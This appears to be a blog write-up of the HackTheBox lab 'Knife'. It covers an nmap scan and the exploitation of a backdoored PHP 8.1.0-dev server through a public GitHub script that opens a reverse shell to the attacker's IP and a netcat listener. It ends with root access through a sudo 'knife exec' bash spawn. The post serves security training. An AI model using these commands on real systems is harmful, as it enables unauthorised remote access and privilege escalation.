Press "Enter" to skip to content

HTB Walkthrough : Knife

Published August 29, 2021 by pentestsky
pentestsky

Last updated on September 1, 2021

Today we are going to solve another challenge from HackTheBox know as “Knife” design by mrkn16h7 . This lab is based on PHP vulnerability , so without wasting too much time let start the journey.

Level : Easy

Attacking Strategy

  • Network scanning
    • Nmap
  • Recon
    • PHP Version
  • Exploitation
    • PHP 8.1.0 RCE
  • Privilege Escalation
    • Sudoers over knife

Walkthrough

IP address : 10.10.10.242

We start with Nmap scan with all ports to enumerate the open ports and services on target .

Enumeration

nmap -p- -sC -sV 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Recon

From the scan we get to know the open ports i.e. port 22 and port 80 and with title its some medical field project . While enumerating the HTTP service we got the PHP version which is 8.1.0-dev which is vulnerable to RCE .

Exploitation

After googling some time , there is an exploit available on GitHub . PHP 8.1.0 have the remote code execution , an attacker can execute arbitrary code by sending the User-Agent header . 

git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
cd php-8.1.0-dev-backdoor-rce
ls
python revshell_php_8.1.0-dev.py Remote_host Attacker_ip Listen_port
python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.73 1234

once the exploit is successful we got the shell on netcat on port 1234 . After receiving the shell we make it a proper TTY shell by upgrading it and export the shell and other variables . 

sudo nc -lvnp 1234
id

Privilege Escalation

Now its time to get the root so we start with Sudoers entry and here knife program can be run without the password . Generally knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server . We can also perform the command execution using exec .

sudo -l

After reading some information of knife we processed to execute the bash with root .

sudo /usr/bin/knife exec -E 'system("bin/bash")'
cd /root
cat root.txt
cat /home/james/user.txt
pentestsky

pentestsky

Published in CTF and HackTheBox

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.